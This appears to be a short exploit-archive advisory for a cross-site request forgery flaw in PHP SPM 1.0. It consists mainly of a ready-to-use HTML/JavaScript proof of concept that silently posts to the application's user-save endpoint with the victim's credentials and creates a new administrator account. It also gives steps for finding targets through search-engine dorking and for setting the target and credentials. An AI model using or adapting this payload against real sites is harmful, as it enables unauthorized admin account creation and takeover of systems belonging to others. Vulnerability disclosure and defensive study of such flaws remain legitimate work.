Headline
PHP SPM 1.0 Cross Site Request Forgery
PHP SPM version 1.0 suffers from a cross site request forgery vulnerability.
=============================================================================================================================================| # Title : php spm 1.0 CSRF Add Admin Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) || # Vendor : https://www.kashipara.com/project/download/project2/user/2023/202305/kashipara.com_php-spms-zip.zip |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload inject new admin account.[+] Line 6 Set your Target.[+] Line 15+19 Set your user & pass.[+] save payload as poc.html[+] payload :<!DOCTYPE html> <html> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://127.0.0.1/php-spms/classes/Users.php?f=save", true); xhr.setRequestHeader("Accept", "*\/*"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------"); xhr.withCredentials = true; var body = "-----------------------------\r\n" + "Content-Disposition: form-data; name=\"username\"\r\n" + "\r\n" + "indoushka\r\n" + "-----------------------------\r\n" + "Content-Disposition: form-data; name=\"password\"\r\n" + "\r\n" + "Hacked\r\n" + "-----------------------------\r\n" + "Content-Disposition: form-data; name=\"type\"\r\n" + "\r\n" + "1\r\n" + "-------------------------------\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================